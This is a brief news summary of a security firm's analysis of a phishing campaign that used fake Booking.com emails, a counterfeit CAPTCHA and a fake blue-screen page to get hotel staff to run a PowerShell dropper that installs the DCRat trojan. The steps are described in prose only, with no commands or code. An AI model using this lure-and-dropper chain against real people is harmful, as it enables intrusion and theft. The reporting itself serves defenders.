Cybersecurity researchers disclosed a campaign called PHALT#BLYX that used fake Booking.com reservation emails to deliver the DCRat remote access trojan to European hospitality targets in late December 2025, according to a technical analysis by Securonix.
KEY FACTS
- Campaign PHALT#BLYX targeted the European hospitality sector
- Initial lure Phishing emails impersonated Booking.com with reservation cancellation links
- Method Fake CAPTCHA and bogus blue screen page instructed victims to run a PowerShell command
- Payload DCRat delivered via PowerShell dropper and MSBuild execution
The attack began with phishing messages that warned of unexpected reservation cancellations and redirected recipients to a fake website. The site presented a counterfeit CAPTCHA and then a bogus blue screen of death page with recovery instructions that asked victims to open the Windows Run dialog and paste a command.
That command executed a PowerShell dropper which downloaded an MSBuild project file named v.proj from a remote host. The MSBuild project was run with MSBuild.exe to execute an embedded payload that set Microsoft Defender exclusions, established persistence in the Startup folder, and downloaded and launched the RAT.
If the malware ran with administrator privileges it could disable the security program. If not it entered a loop that triggered a Windows User Account Control prompt every two seconds for three attempts. The PowerShell code also opened a legitimate Booking.com admin page in the default browser as a distraction.
DCRat is a .NET remote access trojan with a plugin architecture that can profile systems, log keystrokes, execute commands, and deliver additional payloads such as cryptocurrency miners. The campaign abused living off the land tools like MSBuild.exe and included room charge details in Euros, suggesting a European focus. The MSBuild file contained Russian language elements linking the activity to Russian threat factors.
WHY IT MATTERS
The use of trusted system binaries and tampering with endpoint defenses makes detection and removal harder for defenders. Hospitality organizations face increased risk to operations and guest data when attackers combine social engineering with living off the land techniques.